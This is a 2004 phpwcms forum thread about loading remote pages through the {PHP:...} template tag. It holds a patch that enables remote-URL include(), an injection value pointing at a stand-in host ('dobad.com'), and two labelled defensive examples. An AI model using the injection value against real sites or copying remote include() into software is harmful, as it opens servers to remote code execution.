{PHP:http://www.mysite.com/index.php?id=1,5,0,0,1}: works?
Posted: Sat 22. May 2004, 20:10
by sustia
Hi, I have been trying to put an inclusion in my home page with the {PHP} replacement tag, but it seems it doesn't work:
I tried this code:
Code:
{PHP:http://www.gabriellagramegna.it/index.php?id=1,5,0,0,1,0}
Is it correct, or did I do something wrong?
Posted: Sat 22. May 2004, 20:15
by Oliver Georgi
This does not work anymore because of security problems. But you can use something like this by creating a new php script like "myextpage.php":
<?php
//include remote URL
include('http://www.gabriellagramegna.it/index.p ... ,5,0,0,1,0');
?>
Then use the replacement tag {PHP:myextpage.php}.
Maybe I should implement a new config var that allows remote URL based on user's choice.
Oliver
Posted: Sat 22. May 2004, 20:22
by sustia
Great, it works
Thanks Oliver!
Posted: Sat 22. May 2004, 20:45
by Oliver Georgi
I have patched phpwcms for the new value in conf.inc.php - but test it. It might be insecure when somebody is able to inject your install via the search form field. Please test!!!
The changed source is available within some hours via CVS or change manually:
front.func.inc.php replace this function around line 1071:
Code:
function include_ext_php($inc_file, $t=0) {
    // includes an external PHP script file and returns
    // the result as string from buffered include content
    $ext_php_content = '';

    //check if this is a local file
    if(is_file($inc_file)) {
        if(!$t) {
            $this_path = str_replace("\\", '/', dirname(realpath($inc_file)));
            $this_path = preg_replace('/\/$/', '', $this_path);
            $root_path = str_replace("\\", '/', PHPWCMS_ROOT);
            $root_path = preg_replace('/\/$/', '', $root_path);
            if(strpos($this_path, $root_path) === 0) $t = 1;
        }
    } else {
        if(!$t) {
            //if remote URL is allowed in conf.inc.php
            if(intval($GLOBALS['phpwcms']['allow_remote_URL'])) $t = 1;
        }
    }

    if($t) {
        ob_start();
        include($inc_file);
        $ext_php_content = ob_get_contents();
        ob_end_clean();
    }
    return $ext_php_content;
}
Add the following value to your conf.inc.php:
Code:
$phpwcms["allow_remote_URL"] = 0; //0 = no remote URL in {PHP:...} replacement tag allowed, 1 = allowed
Oliver
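Added example (not phpwcms code and not written by anyone in this thread): the local-file branch of the function above accepts a path when the root string is a prefix of the file's directory, so without a trailing separator a sibling directory whose name merely starts with the root's name also passes. The sketch below shows a stricter resolver that refuses URLs outright and compares against the root with a separator appended; `resolve_local_include()` and the temporary directory layout are assumptions made for the illustration.

```php
<?php
// Added example, not phpwcms code. resolve_local_include() and the
// directory names below are hypothetical.

// Returns the canonical path of $inc_file when it is a regular file inside
// $root, otherwise false. URLs and stream wrappers are always refused.
function resolve_local_include($inc_file, $root) {
    // A scheme prefix (http:, ftp:, php:, data:) means "not a local file".
    // Two or more characters are required so a Windows drive letter passes.
    if (preg_match('#^[a-z][a-z0-9+.\-]+:#i', $inc_file)) {
        return false;
    }
    $real = realpath($inc_file);
    $base = realpath($root);
    if ($real === false || $base === false || !is_file($real)) {
        return false;
    }
    // Append the separator before comparing, so that the root "/srv/site"
    // is not treated as a prefix of "/srv/site_old".
    $base = rtrim(str_replace('\\', '/', $base), '/') . '/';
    $real = str_replace('\\', '/', $real);
    return strncmp($real, $base, strlen($base)) === 0 ? $real : false;
}

// Constructed layout: <tmp>/site plays PHPWCMS_ROOT, <tmp>/site_old is a sibling.
$tmp = sys_get_temp_dir() . '/incdemo_' . uniqid();
mkdir("$tmp/site", 0700, true);
mkdir("$tmp/site_old", 0700, true);
file_put_contents("$tmp/site/myextpage.php", "<?php echo 'ok';");
file_put_contents("$tmp/site_old/other.php", "<?php echo 'outside';");

$cases = array(
    "$tmp/site/myextpage.php",          // file inside the root
    "$tmp/site/../site_old/other.php",  // sibling whose name starts with "site"
    'http://example.invalid/page.php',  // remote URL
);
foreach ($cases as $case) {
    $ok = resolve_local_include($case, "$tmp/site") !== false;
    echo ($ok ? 'accept ' : 'refuse ') . $case . "\n";
}

// Remove the constructed files again.
unlink("$tmp/site/myextpage.php");
unlink("$tmp/site_old/other.php");
rmdir("$tmp/site");
rmdir("$tmp/site_old");
rmdir($tmp);
```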
Posted: Sun 23. May 2004, 02:03
by sustia
Hi Oliver, the code works fine.
Oliver Georgi wrote: I have patched phpwcms for the new value in conf.inc.php - but test it. It might be insecure when somebody is able to inject your install via the search form field. Please test!!!
Oliver
Do you mean putting something like this in the search form?
Code:
http://www.gabriellagramegna.it/setup/setup.php
I tried to inject this, but nothing happens.
I also tried to inject with the absolute path, but there's no problem.
If you mean something different, please tell me what.
Thanks as always.
Angelo
Posted: Sun 23. May 2004, 08:13
by Oliver Georgi
No, it has nothing to do with this.
There was a security problem when you try to insert something like this in the search field: {PHP:http://www.dobad.com/return_injection_code.php}
Oliver
Posted: Sun 23. May 2004, 09:30
by sustia
Well, I'm not a security expert, but I try.
I made a page with this code:
Code:
SELECT * FROM `phpwcms_user` WHERE usr_login='mylogin'
and saved it in a page (myinjection.php).
Then, from the search field, I tried this:
Code:
{PHP:http://www.mysite.com/myinjection.php}
But I'm not sure that this is the right way to try.
Posted: Sun 23. May 2004, 10:31
by Oliver Georgi
It isn't, but I will not post a sample here.
But if you use a current release - there isn't the problem anymore.
Check what happens if you just use {PHP:jdfjdahfjadh} - after pressing search, the search field should be filled with "jdfjdahfjadh". If so - no security problem.
Oliver
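Added example (not phpwcms code and not written by anyone in this thread): one way to get the behaviour described in the post above, where text typed into the search field comes back without its {PHP:...} wrapper and can no longer be read as a replacement tag by the template parser. `neutralise_php_tag()` is a hypothetical helper and the sample inputs are constructed; how phpwcms itself implements this is not shown on this page.

```php
<?php
// Added example, not phpwcms code: neutralise_php_tag() is a hypothetical helper.

// Makes user-supplied text safe to echo into a page that is later run
// through a {TAG} / {TAG:value} replacement parser.
function neutralise_php_tag($input) {
    // Unwrap {PHP:...} until the string stops changing, so that a tag which
    // only takes shape after an inner tag has been removed is unwrapped too.
    do {
        $before = $input;
        $input = preg_replace('/\{PHP:([^{}]*)\}/i', '$1', $input);
    } while ($input !== $before);

    // HTML-encode first, then encode the braces; doing it the other way
    // round would double-encode the "&" of the brace entities.
    $input = htmlspecialchars($input, ENT_QUOTES);
    return str_replace(array('{', '}'), array('&#123;', '&#125;'), $input);
}

// Constructed sample inputs for a search field.
$samples = array(
    '{PHP:jdfjdahfjadh}',                 // the check suggested in the post
    '{php:http://example.invalid/a.php}', // lower-case tag with a URL value
    '{PH{PHP:}P:x}',                      // tag that re-forms after one pass
    'news {NAV_TABLE_SIMPLE} <b>2004</b>' // other tag syntax plus HTML
);
foreach ($samples as $s) {
    echo str_pad($s, 40) . ' => ' . neutralise_php_tag($s) . "\n";
}
```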
Posted: Sun 23. May 2004, 11:07
by sustia
Yes, I use the current release.
Oliver Georgi wrote:
Check what happens if you just use {PHP:jdfjdahfjadh} - after pressing search, the search field should be filled with "jdfjdahfjadh". If so - no security problem.
Oliver
It is so, Oliver.

Posted: Sun 23. May 2004, 19:08
by art777
Oliver Georgi wrote: This does not work anymore because of security problems. But you can use something like this by creating a new php script like "myextpage.php":
<?php
//include remote URL
include('http://www.gabriellagramegna.it/index.p ... ,5,0,0,1,0');
?>
Then use the replacement tag {PHP:myextpage.php}.
Maybe I should implement a new config var that allows remote URL based on user's choice.
Oliver
This does not work... Maybe I don't understand this...
What I did:
1. I want to have the content of http://info.cms.to.pl/index.php?id=1,1,0,0,1,0 in the left column in "templates".
2. Made the file newsy.php (in root - http://info.cms.to.pl/newsy.php )
Code:
<?php
//include remote URL
include ('http://info.cms.to.pl/index.php?id=1,1,0,0,1,0');
?>
3. In "templates - left" set:
Code:
{NAV_TABLE_SIMPLE}<br><br>
{PHP:newsy.php}
4. and in left column - http://info.cms.to.pl/index.php?id=1,1,0,0,1,0
Code:
Warning: main(http://info.cms.to.pl/index.php?id=1,1,0,0,1,0): failed to open stream: HTTP request failed! D_FâŠ1$[7FZ7F in /home/dealer/main/pkg/cms/info/html/newsy.php on line 3
Warning: main(): Failed opening 'http://info.cms.to.pl/index.php?id=1,1,0,0,1,0' for inclusion (include_path='.:/usr/lib/php') in /home/dealer/main/pkg/cms/info/html/newsy.php on line 3
And in conf.inc.php I added:
Code:
$phpwcms["allow_remote_URL"] = 1; //0 = no remote URL in {PHP:...} replacement tag allowed, 1 = allowed
What am I doing wrong?

(phpwcms_1.1-RC4_2004-05-22 - new install)
Posted: Sun 23. May 2004, 19:14
by Oliver Georgi
1. You have to extend the function for including external php files as posted above.
2. If you set allow_remote_URL, it is enough to use {PHP:http://info.cms.to.pl/index.php?id=1,1,0,0,1,0}
Oliver
Posted: Sun 23. May 2004, 19:27
by art777
I changed
Code:
{NAV_TABLE_SIMPLE}<br><br>
{PHP:newsy.php}
to:
Code:
{NAV_TABLE_SIMPLE}<br><br>
{PHP:http://info.cms.to.pl/index.php?id=1,1,0,0,1,0}
in conf.inc.php still is:
and on the site the left column is blank - http://info.cms.to.pl/index.php?id=1,0,0,1,0,0

Posted: Sun 23. May 2004, 20:07
by Oliver Georgi
But did you do this:
http://www.phpwcms.de/forum/viewtopic.php?p=12808#12808
For me - it works - but it's false to include content this way because you will get double <body> and so on...
Oliver
Posted: Sun 23. May 2004, 21:49
by art777
How can I insert content (from phpwcms) into a template in some other way (not into {CONTENT})?
Posted: Sun 23. May 2004, 22:03
by Oliver Georgi
It's in preparation. But it is not easily possible at the moment. There was a hack for this somewhere in this forum.
Oliver